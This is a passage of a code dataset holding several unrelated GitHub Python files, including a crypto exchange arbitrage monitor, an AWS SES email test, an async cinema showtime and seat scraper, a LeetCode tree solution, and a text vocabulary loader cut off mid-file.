test_path=os.path.join(modelpath,video_name+'_test')#\"./knn_classes/train_it2/\"\n acc=test(test_path,KKK)\n print(acc)\n\n","repo_name":"chenzhike110/Fast-tracking","sub_path":"ORBmin.py","file_name":"ORBmin.py","file_ext":"py","file_size_in_byte":10605,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"32"}
+{"seq_id":"28655868508","text":"# -*- coding: utf-8 -*-\nimport telegram\nimport time\nimport sys\nimport config\nfrom exchage_api.bittrex import bittrex\nfrom exchage_api.poloniex import poloniex\nimport util\n\n# Variable declarations\nmarketcurrency = config.markgetcurrency # base coin\n#altcurrency = config.altcurrency # altcoin\naltcurrency = 'DGB' # altcoin\nspread = 0.8 # difference 0.8%\nbittrex_market = '{0}-{1}'.format(marketcurrency, altcurrency)\npoloniex_market = '{0}_{1}'.format(marketcurrency, altcurrency)\nis_marketcurrency_transfering = False\nis_altcurrency_transfering = False\nbittrex_api = config.bittrex_api\nbittrex_key = config.bittrex_key\npoloniex_api = config.poloniex_api\npoloniex_key = config.poloniex_key\nbittrex_marketcurrency_bal = 0\npoloniex_marketcurrency_bal = 0\nbittrex_altcurrency_bal = 0\npoloniex_altcurrency_bal = 0\nbittrex_marketcurrency_address = '1DAFcmkeQiMWdhAmwKBLmx9pUpM4yak4DC'\npoloniex_marketcurrency_address = '1J4LrydHhH356J1ykvbXVDsj4a2s2497PP'\nbittrex_altcurrency_address = 'DPCgJ15dvMSTVvSKUX1LU1s4RZs5Dk2T8H'\npoloniex_altcurrency_address = 'DBCLd1NZpKFjc8eo2RgyWL43a6zBkCqTLP'\ntelegram_token = config.telegram_token\ntelegram_chat_id = config.telegram_chat_id\nspread = 0.8 # %\nspread = spread / 100\nbot = telegram.Bot(token=telegram_token)\n# Create API objects\nbitt = bittrex(bittrex_api, bittrex_key)\npolo = poloniex(poloniex_api, poloniex_key)\n\n\ndef send_message(msg=None):\n print(msg)\n #bot.sendMessage(chat_id=telegram_chat_id, text=msg)\n\n\ndef send_message_with_error(message=None):\n msg = \"⚠️ Error - wait 10 min\\n{0}\".format(message)\n print(msg)\n bot.sendMessage(chat_id=telegram_chat_id, text=msg)\n\n\n# Balance adjustment\ndef balancing():\n global bittrex_marketcurrency_bal\n global 
poloniex_marketcurrency_bal\n global bittrex_altcurrency_bal\n global poloniex_altcurrency_bal\n global is_marketcurrency_transfering\n global is_altcurrency_transfering\n\n # Determine whether a transfer is in progress\n # When funds are sent, set the transfer flag to true\n # Remember the balance before sending; once it has grown by the transferred amount (allowing for fees), treat the transfer as complete\n\n is_marketcurrency_transfering = False\n if not is_marketcurrency_transfering:\n # Check Market Currency balances\n try:\n bittrex_marketcurrency_bal = float(bitt.getbalance(marketcurrency)['Available'])\n except:\n print('bittrex get balance error-{0}'.format(bitt.getbalance(marketcurrency)['Available']))\n bittrex_marketcurrency_bal = 0\n try:\n poloniex_marketcurrency_bal = float(polo.returnBalances()[marketcurrency])\n except:\n print('poloniex get balance error-{0}'.format(polo.returnBalances()[marketcurrency]))\n poloniex_marketcurrency_bal = 0\n total_marketcurrency_bal = bittrex_marketcurrency_bal + poloniex_marketcurrency_bal\n print('bittrex : {0:8f}{1} / poloniex : {2:8f}{3}'.format(bittrex_marketcurrency_bal, marketcurrency, poloniex_marketcurrency_bal, marketcurrency))\n\n # Adjust Market Currency balances\n if bittrex_marketcurrency_bal / total_marketcurrency_bal > 0.8:\n try:\n transfer_amount = bittrex_marketcurrency_bal - (total_marketcurrency_bal / 2)\n #bitt.withdraw(marketcurrency, transfer_amount, poloniex_marketcurrency_address)\n send_message('withdraw to Poloniex : {0:8f}{1}'.format(transfer_amount, marketcurrency))\n except:\n send_message_with_error('error')\n if poloniex_marketcurrency_bal / total_marketcurrency_bal > 0.8:\n try:\n transfer_amount = poloniex_marketcurrency_bal - (total_marketcurrency_bal / 2)\n #polo.withdraw(marketcurrency, transfer_amount, bittrex_marketcurrency_address)\n send_message('withdraw to Bittrex : {0:8f}{1}'.format(transfer_amount, marketcurrency))\n except:\n send_message_with_error('error')\n\n # Check Alt Currency balances\n is_altcurrency_transfering = False\n if not is_altcurrency_transfering:\n try:\n bittrex_altcurrency_bal = float(bitt.getbalance(altcurrency)['Available'])\n except:\n bittrex_altcurrency_bal = 0\n try:\n poloniex_altcurrency_bal = float(polo.returnBalances()[altcurrency])\n except:\n poloniex_altcurrency_bal = 0\n total_altcurrency_bal = bittrex_altcurrency_bal + poloniex_altcurrency_bal\n print('bittrex : {0:8f}{1} / poloniex : {2:8f}{3} '.format(bittrex_altcurrency_bal, altcurrency, poloniex_altcurrency_bal, altcurrency))\n\n # Adjust Alt Currency balances\n if bittrex_altcurrency_bal / total_altcurrency_bal > 0.8:\n try:\n transfer_amount = bittrex_altcurrency_bal - (total_altcurrency_bal / 2)\n #bitt.withdraw(altcurrency, transfer_amount, poloniex_altcurrency_address)\n send_message('withdraw to Poloniex : {0:8f}{1}'.format(transfer_amount, altcurrency))\n except:\n send_message_with_error('withdraw to Poloniex : {0:8f}{1}'.format(transfer_amount, altcurrency))\n if poloniex_altcurrency_bal / total_altcurrency_bal > 0.8:\n try:\n transfer_amount = poloniex_altcurrency_bal - (total_altcurrency_bal / 2)\n #polo.withdraw(altcurrency, transfer_amount, bittrex_altcurrency_address)\n send_message('withdraw to Bittrex : {0:8f}{1}'.format(transfer_amount, altcurrency))\n except:\n send_message_with_error('withdraw to Bittrex : {0:8f}{1}'.format(transfer_amount, altcurrency))\n\n\n# Fetch order books\ndef getorderbook():\n # Fetch Bittrex order book\n #decimal.getcontext().prec = 8\n bittrex_orderbook = bitt.getorderbook(bittrex_market, 'both', 1)\n bittrex_buyorder = bittrex_orderbook['buy']\n bittrex_sellorder = bittrex_orderbook['sell']\n #print(bittrex_orderbook)\n poloniex_orderbook = 
polo.returnOrderBook(poloniex_market)\n poloniex_buyorder = poloniex_orderbook['bids']\n poloniex_sellorder = poloniex_orderbook['asks']\n #print(poloniex_orderbook)\n '''\n for order in bittrex_buyorder:\n print(float(order['Rate'])*1000) #descending order\n print(\"------------------------------------------\")\n for order in poloniex_buyorder: #descending order\n print(order[0])\n \n for order in bittrex_sellorder:\n\n print(round(decimal.Decimal(bittrex_sellorder[0]['Rate']), 8)) #ascending order\n #round(decimal.Decimal(order['Rate']), 8)\n #print(\"------------------------------------------\")\n for order in poloniex_sellorder: #ascending order\n print(decimal.Decimal(order[0]))\n \n print(util.toSatoshi(bittrex_sellorder[0]['Rate']), bittrex_sellorder[0]['Quantity'])\n print(util.toSatoshi(poloniex_buyorder[0][0]), poloniex_buyorder[0][1])\n print(util.toSatoshi(bittrex_sellorder[0]['Rate'] - float(poloniex_buyorder[0][0])))\n '''\n bittrex_current_sell = util.toSatoshi(bittrex_sellorder[0]['Rate'])\n bittrex_current_buy = util.toSatoshi(bittrex_buyorder[0]['Rate'])\n poloniex_current_sell = util.toSatoshi(poloniex_sellorder[0][0])\n poloniex_current_buy = util.toSatoshi(poloniex_buyorder[0][0])\n print('Bittrex buy:', bittrex_current_buy, marketcurrency, 'sell:', bittrex_current_sell, marketcurrency)\n print('Poloniex buy:', poloniex_current_buy, marketcurrency, 'sell:', poloniex_current_sell, marketcurrency)\n print('bitt:polo', 1 - bittrex_current_sell/poloniex_current_buy)\n print('polo:bitt', 1 - bittrex_current_sell / poloniex_current_buy)\n if poloniex_current_buy > bittrex_current_sell and 1 - bittrex_current_sell/poloniex_current_buy > spread:\n #print((1 - (bittrex_current_sell/poloniex_current_buy))*100, \"%\")\n print(u'💰 Difference : ', round((1 - (bittrex_current_sell / poloniex_current_buy)) * 100, 2), \"%\", ' / Buy at Bittrex!!')\n\n if bittrex_current_buy > poloniex_current_sell and 1 - poloniex_current_sell/bittrex_current_buy > spread:\n print(u'💰 Difference : ', round((1 - (poloniex_current_sell / bittrex_current_buy))*100, 2), \"%\", ' / Buy at Poloniex')\n\n## Orders\n\n'''\nprint(polo.returnTicker())\n# Getting the BTC price for DGB\ncurrencysummary = bitt.getmarketsummary(market_bitt)\ncurrencyprice = currencysummary[0]['Last']\n#print ('The price for {0} is {1:.8f} {2}.'.format(currency, currencyprice, trade))\n\n# Check all balances\nbalances = bitt.getbalances()\nfor coin in balances:\n if coin['Balance'] == 0:\n continue\n print('{0} : {1:.8f}'.format(coin['Currency'], coin['Balance']))\n\n#dogebalance = bittApi.getbalance(currency)\n'''\n\nif __name__ == '__main__':\n #balancing()\n while True:\n try:\n getorderbook()\n time.sleep(10)\n except:\n print(\"⚠️ Bot paused during 1 min -\", sys.exc_info())\n time.sleep(60*1)\n print(\"🔆 Bot resumed\")\n","repo_name":"hobbit19/Arbitrage_BOT","sub_path":"trader.py","file_name":"trader.py","file_ext":"py","file_size_in_byte":8882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"69922697691","text":"from unittest import mock\n\nimport botocore.session\nfrom botocore.stub import Stubber\nfrom django.conf import settings\n\nimport project.apps.api.tasks\nfrom project.apps.api.tasks import send_email\n\n\ndef test_send_email(monkeypatch):\n email = \"user@example.com\"\n\n monkeypatch.setattr(settings, \"AWS_SES_EMAIL_SOURCE\", email)\n monkeypatch.setattr(settings, \"AWS_SES_REGION\", \"default\")\n\n ses_client = botocore.session.get_session().create_client(\n \"ses\", region_name=settings.AWS_SES_REGION\n )\n 
stubber = Stubber(ses_client)\n\n def client_mock(a, **kwargs):\n return ses_client\n\n boto3_mock = mock.Mock()\n boto3_mock.client = client_mock\n monkeypatch.setattr(project.apps.api.tasks, \"boto3\", boto3_mock)\n\n expected_response = {\"MessageId\": \"12345\"}\n\n subject = \"Welcoming\"\n body = \"Hi There!\"\n\n expected_args = {\n \"Source\": email,\n \"Destination\": {\"ToAddresses\": (email,)},\n \"Message\": {\n \"Subject\": {\"Data\": subject},\n \"Body\": {\"Text\": {\"Data\": body}},\n },\n }\n\n stubber.add_response(\"send_email\", expected_response, expected_args)\n stubber.activate()\n\n send_email((email,), subject=subject, body=body)\n","repo_name":"libdx/treasury","sub_path":"project/tests/integration/test_api/test_send_email.py","file_name":"test_send_email.py","file_ext":"py","file_size_in_byte":1215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"74349044890","text":"import time\nimport requests\nimport json\nimport logging\nimport re\nimport urllib.parse\nfrom datetime import datetime\nfrom random import randint\nfrom typing import List, Optional\nimport aiohttp\nimport asyncio\nfrom bs4 import BeautifulSoup\nfrom requests_html import AsyncHTMLSession\nfrom datetime import date\n\nfrom cinemas.models import Cinema, ScraperTask, ShowtimeSeats\nfrom cinemas.models import Movie as DjangoMovie\nfrom common.models import Country\n\nsession = AsyncHTMLSession()\n\n\nlogging.basicConfig(\n level=logging.DEBUG,\n format=\"%(asctime)s [%(levelname)s] %(message)s\",\n handlers=[\n logging.FileHandler(\"./novocinemas.log\"),\n logging.StreamHandler()\n ]\n)\nMAIN_PAGE = \"https://reelcinemas.com/en-ae/\"\nTCPCONNECTOR_LIMIT = 50\nSESSION_TIMEOUT_SEC = 5200\n\nSLEEP_BEFORE_REQUESTS_SEC = 1\n# get movies for this day\nDAY = date.today().strftime('%Y-%m-%d')\n'''{\n movie : \n {mall_name : \n {\n exp : [1,2,3] - sold/empty\n }\n }\n}'''\nHEADERS = {\n \"User-Agent\": \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36\"\n}\n\n\nasync def post_request(session: aiohttp.ClientSession, url: str,\n params: dict = None,\n data: dict = None,\n json: dict = None) -> Optional[str]:\n for i in range(3):\n try:\n async with session.post(url, params=params, data=data, json=json, timeout=120) as resp:\n logging.debug(f\"Loading data from {url}, params - {params}, data - {data}, json - {json}\")\n if resp.ok:\n return await resp.text()\n else:\n logging.error(f\"Page failed to load. Url - {resp.url}. Status code - {resp.status}. Trying again\")\n await asyncio.sleep(randint(5, 60))\n except asyncio.TimeoutError:\n logging.error(f\"Timeout Error. Url - {url}. Trying again\")\n continue\n except Exception as e:\n await asyncio.sleep(randint(5, 60))\n logging.error(f\"Error - {e}. Url - {url}. Trying again\")\n continue\n return None\n\n\nasync def get_html(session: aiohttp.ClientSession, url: str, params: dict = None):\n if params is None:\n params = {}\n\n while True:\n async with session.get(url, params=params) as resp:\n logging.debug(f\"Loading page {url}, params - {params}\")\n try:\n if resp.ok:\n return await resp.text()\n else:\n logging.error(f\"Page failed to load. Url - {resp.url}. Status code - {resp.status}. 
Trying again\")\n await asyncio.sleep(randint(5,30))\n except Exception as e:\n print(\"Insdie get_html execption..\")\n\n\ndef get_asp_net_cookie():\n url = \"https://reelcinemas.com/en-ae/\"\n time.sleep(SLEEP_BEFORE_REQUESTS_SEC)\n response = requests.get(url, headers=HEADERS, verify=False)\n asp_net_cookie = response.cookies['ASP.NET_SessionId']\n return asp_net_cookie\n\n\ndef extract_url_parts(onclick): ##get the movie id and title\n pattern = r'MovieDetailsPage\\(\"(.*?)\",\"(.*?)\"\\)'\n match = re.search(pattern, onclick)\n if match:\n return match.group(1), match.group(2)\n return None, None\n\n\nasync def get_movies(session: aiohttp.ClientSession): ##get movie name and url\n url = \"https://reelcinemas.com/en-ae/\"\n time.sleep(SLEEP_BEFORE_REQUESTS_SEC)\n response = await get_html(session, url)\n # if response.status_code == 200:\n # Save the response content to a file\n # with open('/Users/n.purushottam.lagad/Downloads/reel.txt','wb') as file:\n # file.write(response.content)\n # print(f\"Downloaded the response content\")\n soup = BeautifulSoup(response, 'html.parser')\n movie_items = soup.find_all('div', {'class': 'movie-item'})\n movies = []\n for movie_item in movie_items:\n try:\n movie_title = movie_item['id']\n language = soup.find('div', class_='duration-language').find_all('span')[-1].get_text(strip=True)\n movie_id, title_dashed = extract_url_parts(\n str(movie_item)) ## movie_id = group(1) and title_dashed = group(2)\n movie_url = f\"https://reelcinemas.com/en-ae/movie-details/{movie_id}/{title_dashed}\" ##movie_id = HO00003413 & title_dashed = Fast-X-\n movies.append((movie_title, movie_url, movie_id, language))\n except:\n pass\n print(f\"movies_len : {len(movies)}\")\n return movies\n\n\ndef get_movie_session(asp_net_cookie, magic_string):\n url = \"https://reelcinemas.com/WebApi/api/UserAPI/CreateMovieCookie\"\n headers = {\n \"User-Agent\": \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36\",\n \"Content-Type\": \"application/json\",\n \"ASP.NET_SessionId\": asp_net_cookie\n }\n # time.sleep(SLEEP_BEFORE_REQUESTS_SEC)\n response = requests.post(url=url, headers=headers, data='\"' + magic_string + '\"', verify=False)\n movie_session = response.cookies['movieSession']\n return movie_session\n\n\ndef extract_num_empty(input_str):\n pattern = r'status:empty'\n matches = re.findall(pattern, input_str)\n return len(matches)\n\n\ndef extract_num_sold(input_str):\n pattern = r'status:sold'\n matches = re.findall(pattern, input_str)\n return len(matches)\n\n\ndef extract_experience(input_str):\n return input_str['Experience']\n # exp = input_str['cinemaConfig']\n # experience = exp['ComboSeatSelection']['Experiences'][0]\n # return experience\n\n\nasync def get_seating_info(session: aiohttp.ClientSession):\n url = \"https://reelcinemas.com/WebApi/api/SeatLayourAPI/GetSeatLayout\"\n # cookies = {\n # \"ASP.NET_SessionId\": asp_net_cookie,\n # \"movieSession\": movie_session,\n # }\n response = await get_html(session, url)\n t = json.loads(response)\n experience = extract_experience(t)\n area_entity_list = t[\"Sourcedata\"][\"AreaEntityList\"]\n ticket_list = t.get(\"Sourcedata\").get(\"TicketList\", [])\n seats_list = []\n if area_entity_list:\n for area_entity in area_entity_list:\n area_code = area_entity[\"AreaCode\"]\n area_description = area_entity[\"AreaDescription\"]\n row_entity_list = area_entity[\"rowEntityList\"]\n\n empty_count = sum(1 for row_entity in row_entity_list for seat_entity in 
row_entity[\"seatEntityList\"] if\n seat_entity[\"Status\"] == \"Empty\")\n sold_count = sum(1 for row_entity in row_entity_list for seat_entity in row_entity[\"seatEntityList\"] if\n seat_entity[\"Status\"] == \"Sold\")\n for ticket in ticket_list:\n if ticket[\"AreaCode\"] == area_code:\n price_in_aed = ticket[\"PriceInAed\"]\n print(f\"AreaCode: {area_code}, AreaDescription: {area_description}\")\n print(f\"Empty Count: {empty_count}, Sold Count: {sold_count}, {price_in_aed}\")\n seats_price = [area_description, empty_count, sold_count, experience, price_in_aed]\n print(seats_price)\n seats_list.append(seats_price)\n return seats_list\n\n\n# async def get_seating_info(session: aiohttp.ClientSession):\n# try:\n# url = \"https://reelcinemas.com/WebApi/api/SeatLayourAPI/GetSeatLayout\"\n# response = await get_html(session, url)\n# t = json.loads(response)\n# experience = extract_experience(t)\n# s = response.replace('\"', '').lower()\n# num_empty = extract_num_empty(s)\n# num_sold = extract_num_sold(s)\n# ticket_list = t.get(\"Sourcedata\").get(\"TicketList\", [])\n# ticket_descriptions = [ticket[\"TicketDescription\"] for ticket in ticket_list]\n# ticket_prices = [ticket[\"PriceInAed\"] for ticket in ticket_list]\n# return num_empty, num_sold, experience, ticket_descriptions, ticket_prices\n# except Exception as e:\n# print(\"Inside get_seating_info exception\")\n# print(e)\n\n\nasync def get_seats(showtimes):\n seats = []\n try:\n magic_string = showtimes[-2]\n connector = aiohttp.TCPConnector(force_close=True, limit=TCPCONNECTOR_LIMIT)\n timeout = aiohttp.ClientTimeout(total=SESSION_TIMEOUT_SEC)\n\n # In order not to work with cookies manually, we start a new session.\n # Session cookies persist throughout the session. Same functionality in the requests.Session class\n async with aiohttp.ClientSession(connector=connector, headers=HEADERS, timeout=timeout) as new_session:\n url = \"https://reelcinemas.com/en-ae/\"\n await get_html(new_session, url)\n\n url = \"https://reelcinemas.com/WebApi/api/UserAPI/CreateMovieCookie\"\n await post_request(new_session, url, json=magic_string)\n seating_info = await get_seating_info(new_session)\n\n try:\n if seating_info:\n for sp in seating_info:\n num_empty = sp[1]\n num_sold = sp[2]\n seats_area = sp[0]\n num_total = num_empty + num_sold\n print(f\"{showtimes[1]}--{showtimes[2]}--{showtimes[3]}--{num_total}\")\n country = showtimes[0]\n movie_name = showtimes[1]\n cinema_title = showtimes[2]\n showtime = showtimes[3]\n scraping_date = showtimes[4]\n processing_date = showtimes[5]\n movie_language = showtimes[7]\n experience = sp[3]\n ticket_prices = sp[4]\n\n print(f\"{showtimes[1]}--{showtimes[2]}--{showtimes[3]}--{num_total}--{experience}--{ticket_prices}\")\n total = [country, movie_name, cinema_title, showtime, seats_area, num_total, num_sold, experience,\n ticket_prices, scraping_date, processing_date, movie_language]\n print(total)\n seats.append(total)\n return seats\n except Exception as e:\n print(\"INSIDE INSIDE INSIDE...\")\n print(e)\n pass\n except ConnectionError:\n print(\"Connection error...\")\n print(\"break...\")\n pass\n\n\nasync def get_showtimes_by_date(session: aiohttp.ClientSession, movie, date: datetime.date, code) -> List:\n showtimes = []\n params = {\n \"movieId\": movie[2],\n \"date\": date.strftime(\"%Y-%m-%d\"),\n \"cinemas\": code\n }\n url = urllib.parse.urljoin(MAIN_PAGE, \"MovieDetails/GetMovieShowTimes\")\n response = await post_request(session, url, params=params)\n # with 
open('/Users/n.purushottam.lagad/Downloads/reel_show.txt','w') as file:\n # file.write(html)\n response_json = json.loads(response)\n soup = BeautifulSoup(response_json, \"lxml\")\n if \"No Schedules found\" in response:\n return []\n\n a = soup.find_all('a')\n for a_tag in a:\n if a_tag.get(\"onclick\"):\n magic_string = re.search(r'\"([^\"]*)\"', a_tag.get(\"onclick\")).group(1)\n elif a_tag.get(\"href\"):\n magic_string = a_tag.get(\"href\").split(\"','\")[6]\n else:\n raise ValueError(\"Showtime parsing error. Unexpected html\")\n\n showtime = a_tag.find('div', class_='showtime').text\n print('magic_string:', magic_string)\n print('showtime:', showtime)\n print('---')\n # time_obj = datetime.strptime(time_a, \"%I:%M %p\").time()\n # url = urllib.parse.urljoin(MAIN_PAGE, time_a.get(\"href\"))\n # datetime_obj = datetime.combine(date, time_obj)\n movie_name = movie[0]\n movie_language = movie[3]\n if params['cinemas'] == '0001':\n cinema_title = 'The Dubai Mall'\n if params['cinemas'] == '0002':\n cinema_title = 'Dubai Marina Mall'\n if params['cinemas'] == '0006':\n cinema_title = 'The Springs Souk'\n print(f\"{movie_name}--{cinema_title}--{showtime}\")\n country = MAIN_PAGE.split(\"/\")[3]\n current_date = date.today()\n scraping_date = datetime.now().strftime('%Y%m%d %H:%M')\n processing_date = current_date.strftime(\"%Y%m%d\")\n\n total = [country, movie_name, cinema_title, showtime, scraping_date, processing_date,\n magic_string, movie_language]\n print(total)\n showtimes.append(total)\n return showtimes\n\n\nasync def get_movie_showtimes(session: aiohttp.ClientSession, movie, query_date_str: str):\n movie_html = await get_html(session, movie[1])\n # with open('/Users/n.purushottam.lagad/Downloads/reel_movie_show.txt','w') as file:\n # file.write(movie_html)\n soup = BeautifulSoup(movie_html, \"lxml\")\n # language_id = soup.find(\"input\", {\"id\": \"SelectedLanguageId\"}).get(\"value\")\n # movie = movie._replace(language_id=language_id)\n\n available_date_items = soup.findAll(\"div\", class_=\"dboxelement\")\n showtimes = []\n cinema_code = ['0001', '0002', '0006']\n for date_item in available_date_items:\n date_str = date_item.get('id')\n if date_str != query_date_str:\n continue\n date_obj = datetime.strptime(date_str, \"%Y-%m-%d\").date()\n for code in cinema_code:\n showtimes += await get_showtimes_by_date(session, movie, date_obj, code)\n logging.info(f\"Received {len(showtimes)} showtimes for {movie[0]}\")\n return showtimes\n\n\nasync def get_all_showtimes(session: aiohttp.ClientSession,\n movies,\n date_str: str): ## create separate task for each movie to get showtimes\n tasks = []\n for movie in movies:\n task = asyncio.create_task(get_movie_showtimes(session, movie, date_str))\n tasks.append(task)\n showtimes = await asyncio.gather(*tasks)\n results = []\n for showtime in showtimes:\n results += showtime\n logging.info(f\"Summary received {len(results)} showtimes.\")\n return results\n\n\nasync def get_all_seats(movie_showtimes):\n tasks = []\n for show in movie_showtimes:\n task = asyncio.create_task(get_seats(show))\n tasks.append(task)\n showtimes = await asyncio.gather(*tasks)\n results = []\n for showtime in showtimes:\n results += showtime\n logging.info(f\"Summary received {len(results)} showtimes in final layer.\")\n return results\n\n\nasync def main(date_str):\n connector = aiohttp.TCPConnector(force_close=True, limit=TCPCONNECTOR_LIMIT)\n timeout = aiohttp.ClientTimeout(total=SESSION_TIMEOUT_SEC)\n async with aiohttp.ClientSession(connector=connector, 
headers=HEADERS, timeout=timeout) as session:\n # total_movies = []\n # start_time = time.time()\n # asp_net_cookie = get_asp_net_cookie()\n movies = await get_movies(session)\n movie_showtimes = await get_all_showtimes(session, movies, date_str)\n movie_seats = await get_all_seats(movie_showtimes)\n\n return movie_seats\n # df1 = pd.DataFrame(data=movie_seats,\n # columns=['country', 'movie_name', 'cinema_title', 'show_time', 'seats_area', 'seats_total',\n # 'seats_sold', 'experience', 'ticket_prices', 'scraping_date',\n # 'processing_date', 'movie_language'])\n # df1.to_csv(\"reel_final5.csv\")\n\n\ndef calling_main(date_str):\n showtimes = asyncio.new_event_loop()\n showtimes = showtimes.run_until_complete(main(date_str))\n\n\ndef save_to_django_db(task: ScraperTask):\n logging.info(f\"Start task for {task.cinema_provider.name} {task.id}\")\n search_date_str = task.date_query.strftime(\"%Y-%m-%d\")\n showtimes = asyncio.run(main(search_date_str))\n\n for showtime in showtimes:\n country, created = Country.objects.get_or_create(name=showtime[0])\n cinema, created = Cinema.objects.get_or_create(name=showtime[2], country=country)\n movie, created = DjangoMovie.objects.get_or_create(name=showtime[1], language=showtime[11])\n\n showtime_time_obj = datetime.strptime(showtime[3], '%I:%M %p')\n showtime_datetime_obj = datetime.combine(task.date_query, showtime_time_obj.time())\n ShowtimeSeats.objects.create(\n task=task,\n cinema=cinema,\n movie=movie,\n datetime=showtime_datetime_obj,\n experience=showtime[7],\n all=showtime[5],\n sold=showtime[6],\n price=showtime[8],\n area=showtime[4],\n )\n","repo_name":"LopatKing/cinema-scrapers","sub_path":"django/scrapers/reelcinema.py","file_name":"reelcinema.py","file_ext":"py","file_size_in_byte":16603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"7428325483","text":"# LeetCode imports\nfrom LeetCode.GlobalStructures import TreeNode\nfrom typing import Optional\n\n\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\n\nclass Solution:\n def maximumAverageSubtree(self, root: Optional[TreeNode]) -> float:\n '''\n Initial and Optimal\n '''\n max_avg = 0\n \n def AvgUsingDFS(node):\n nonlocal max_avg\n \n if not node:\n return 0, 0\n \n left_count, left_sum = AvgUsingDFS(node.left)\n right_count, right_sum = AvgUsingDFS(node.right)\n curr_count = left_count + 1 + right_count\n curr_sum = left_sum + node.val + right_sum\n \n max_avg = max(max_avg, curr_sum / curr_count)\n return curr_count, curr_sum\n \n AvgUsingDFS(root)\n return max_avg","repo_name":"PyroGenesis/Comprehensive-Coding-Solutions","sub_path":"LeetCode/1120-Maximum-Average-Subtree.py","file_name":"1120-Maximum-Average-Subtree.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"29999432047","text":"\ndef colour_harmony(anchor, c):\n colours=[\"red\",\"red-orange\",\"orange\",\"yellow-orange\",\"yellow\",\"yellow-green\"]\n colours+=[\"green\",\"blue-green\",\"blue\",\"blue-violet\",\"violet\",\"red-violet\"]\n \n combs = {}\n combs[\"complementary\"] = [0,6]\n combs[\"analogous\"] = [0,1,-1]\n combs[\"split_complementary\"] = [0,5,-5]\n combs[\"triadic\"] = [0,4,-4]\n combs[\"rectangle\"] = [0,2,6,-4]\n combs[\"square\"] = [0,3,6,-3]\n \n r = colours.index(anchor)\n return {colours[(r+i)%12] for i in 
combs[c]}\n\n","repo_name":"daniel-reich/ubiquitous-fiesta","sub_path":"md4AF8HwJrhrhA5zm_10.py","file_name":"md4AF8HwJrhrhA5zm_10.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"1741105788","text":"## Vocab Primer\nimport os\nimport sys\nimport nltk\nfrom nltk import word_tokenize\nnltk.download('punkt')\nfrom tqdm import tqdm\nimport torch\nimport pandas as pd\nfrom pandas.tseries.offsets import BDay\nfrom datetime import datetime, timedelta, date\n\n\n\nfrom scipy.sparse import csr_matrix\nimport numpy as np\nfrom collections import Counter\nimport matplotlib.pyplot as plt\n\n\nclass Vocab():\n\tdef __init__(self):\n\t\tself.locked = False\n\t\tself.nextID = 0\n\t\tself.word2id = {}\n\t\tself.id2word = {}\n\n\tdef get_id(self, word):\n\t\tif not word in self.word2id:\n\t\t\tif self.locked:\n\t\t\t\treturn -1 \t# UNK token\n\t\t\telse:\n\t\t\t\tself.word2id[word] = self.nextID\n\t\t\t\tself.id2word[self.word2id[word]] = word\n\t\t\t\tself.nextID += 1\n\t\treturn self.word2id[word]\n\n\tdef has_word(self, word):\n\t\treturn word in self.word2id\n\n\tdef has_id(self, wid):\n\t\treturn wid in self.id2word\n\n\tdef get_word(self, wid):\n\t\treturn self.id2word[wid]\n\n\tdef save_vocab(self, vocabFile):\n\t\tfOut = open(vocabFile, 'w')\n\t\tfor word in self.word2id.keys():\n\t\t\tfOut.write(\"%s\\t%s\\n\" % (word, self.word2id[word]))\n\n\tdef get_vocab_size(self):\n\t\t#return self.nextId-1\n\t\treturn self.nextID\n\n\tdef get_words(self):\n\t\treturn self.word2id.keys()\n\n\tdef lock(self):\n\t\tself.locked = True\n\ndef create_vocab(wsb_data):\n vocab = Vocab()\n for item in wsb_data:\n tokenized_item = word_tokenize(item)\n for word in tokenized_item:\n id = vocab.get_id(word.lower())\n vocab.lock()\n return vocab\n\ndef load_csv(csv_file_path, type_=None):\n\tif type_ == \"reddit\" or type_ == None:\n\t\tdata = pd.read_csv(csv_file_path, delimiter=\",\")\n\t\tdata = data[[\"title\", \"score\", \"comms_num\", \"timestamp\"]]\n\n\tif type_ == \"twitter\":\n\t\tdata = pd.read_csv(csv_file_path, delimiter=\",\")\n\n\treturn data\n\n\nclass WSBData():\n\tdef __init__(self, csv_file_path, dataframe=None, vocab=None, train=True):\n\t\t\"\"\" Reads in data into sparse matrix format \"\"\"\n\t\tif not vocab:\n\t\t\tself.vocab = Vocab()\n\t\telse:\n\t\t\tself.vocab = vocab\n\n\t\tif dataframe is not None:\n\t\t\tself.dataframe = dataframe\n\t\telse:\n\t\t\tself.dataframe = pd.read_csv(csv_file_path)\n\n\t\trows = self.dataframe.shape[0]\n\t\tself.lowest_bound = -999999\n\t\tself.get_stats_wsb()\n\n\t\t# if train:\n\t\t# \tdataframe = dataframe.iloc[rows//4:, :]\n\t\t# else:\n\t\t# \tdataframe = dataframe.iloc[:rows//4, :]\n\n\t\t#For csr_matrix (see http://docs.scipy.org/doc/scipy-0.15.1/reference/generated/scipy.sparse.csr_matrix.html#scipy.sparse.csr_matrix)\n\t\tX_values = []\n\t\tX_row_indices = []\n\t\tX_col_indices = []\n\t\tY = []\n\n\t\tXwordList = []\n\t\tXfileList = []\n\n\t\t#Read entries\n\t\tfor i in tqdm(range(len(dataframe))):\n\t\t\trow = dataframe.iloc[i, :]\n\t\t\ttitle = row[0]\n\t\t\twordlist = []\n\t\t\ttokenized_title = word_tokenize(title)\n\t\t\tfor w in tokenized_title:\n\t\t\t\tid = self.vocab.get_id(w.lower())\n\t\t\t\tif id >= 0:\n\t\t\t\t\twordlist.append(id)\n\n\t\t\t# wordList = [self.vocab.get_id(w.lower()) for w in word_tokenize(title) if 